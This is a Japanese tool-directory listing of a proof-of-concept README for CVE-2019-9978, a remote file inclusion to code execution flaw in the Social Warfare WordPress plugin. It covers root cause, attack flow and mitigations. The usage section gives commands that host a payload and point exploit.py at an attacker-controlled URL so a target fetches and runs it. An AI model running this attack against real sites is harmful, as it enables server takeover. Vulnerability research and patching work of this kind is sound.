Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-9978-RCE-PoC — CVE 2019-9978(Social Warfare プラグイン)、根本原因分析と悪用を示すカスタム Python 概念実証。実用的な RFI から RCE への攻撃フローに焦点を当てています。 | Kitploit
ツール/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

CVE 2019-9978(Social Warfare プラグイン)、根本原因分析と悪用を示すカスタム Python 概念実証。実用的な RFI から RCE への攻撃フローに焦点を当てています。

リポジトリを見る
219ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-9978 RCE PoC – Social Warfare WordPress プラグインのエクスプロイト

非認証リモートファイルインクルージョン (RFI) からリモートコード実行 (RCE) へ


📌 説明

このリポジトリは、Social Warfare WordPress プラグイン の深刻な脆弱性 CVE-2019-9978 の悪用を示す Python ベースの概念実証 (PoC) を含んでいます。

この脆弱性により、認証されていない攻撃者 が リモートファイルインクルージョン (RFI) を実行でき、攻撃者が制御するサーバー上で悪意のあるペイロードをホストすることで Remote Code Execution (RCE)* にエスカレートされる可能性があります。

この PoC は、教育および許可されたセキュリティテスト目的のみで、管理された WordPress ラボ環境 で開発およびテストされました。


🔍 脆弱性の概要

  • CVE ID: CVE-2019-9978
  • 影響を受けるコンポーネント: Social Warfare (WordPress プラグイン)
  • 影響を受けるバージョン: ≤ 3.5.2
  • 脆弱性の種類: リモートファイルインクルージョン (RFI)
  • 影響: リモートコード実行 (RCE)
  • 認証の必要性: 不要
  • 攻撃ベクター: リモート
  • 深刻度: 重大

🧠 根本原因分析

Social Warfare プラグインは、リモートコンテンツインクルージョンに使用されるユーザー提供の入力を適切に検証およびサニタイズできません。
その結果、攻撃者は悪意のある外部 URL を提供でき、非認証リモートファイルインクルージョン につながります。

インクルードされたリモートファイルに実行可能な PHP コードが含まれている場合、WordPress サーバーのコンテキストで実行され、リモートコード実行 につながります。


🔄 攻撃フロー


Unauthenticated HTTP Request
↓
Remote File Inclusion (External URL)
↓
Malicious Payload Execution
↓
Remote Code Execution (RCE)


🧪 概念実証 (PoC)

  1. 攻撃者は悪意のあるペイロードを外部 HTTP サーバー上にホストします。
  2. 脆弱な Social Warfare エンドポイントがリモートファイルをインクルードします。
  3. ペイロードがターゲットの WordPress サーバー上で実行されます。
  4. 攻撃者はリモートコマンド実行を獲得します。
  5. エクスプロイトスクリプトは、テストおよび研究目的でこのプロセスを自動化します。

▶️ 使用方法

ステップ 1: ペイロードをホストする

python3 -m http.server 8000

ペイロードファイル(例:payload-main.txt)をサーバーディレクトリに配置します。


ステップ 2: エクスプロイトを実行する

python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt

🛠 必要条件

  • Python 3.x
  • 脆弱なバージョンの Social Warfare WordPress プラグイン
  • WordPress テスト環境
  • ペイロードホスティング用のローカルまたはリモート HTTP サーバー

🛡 緩和策と防御

  • Social Warfare プラグインをパッチ適用済みバージョンに更新する

  • リモートファイルインクルージョンを無効にする:

    allow_url_include = Off
    
  • WordPress プラグインでの外部 URL 処理を制限する

  • RFI 検出ルールを備えた Web アプリケーションファイアウォール (WAF) を導入する


⚠️ 法的免責事項

このプロジェクトは、教育目的および許可されたセキュリティテストのみ を厳格に目的としています。

明示的な許可なくこの概念実証をシステムに対して使用 しないでください。

作成者は、このツールによって引き起こされた誤用や損害について一切責任を負いません。


🔗 参考文献とクレジット

  • 元の研究者: Luka Sikic
  • 元の PoC 参考: https://github.com/hash3liZer/CVE-2019-9978
  • 作者 / 翻案: Vaidehi Muluru
ツールをダウンロード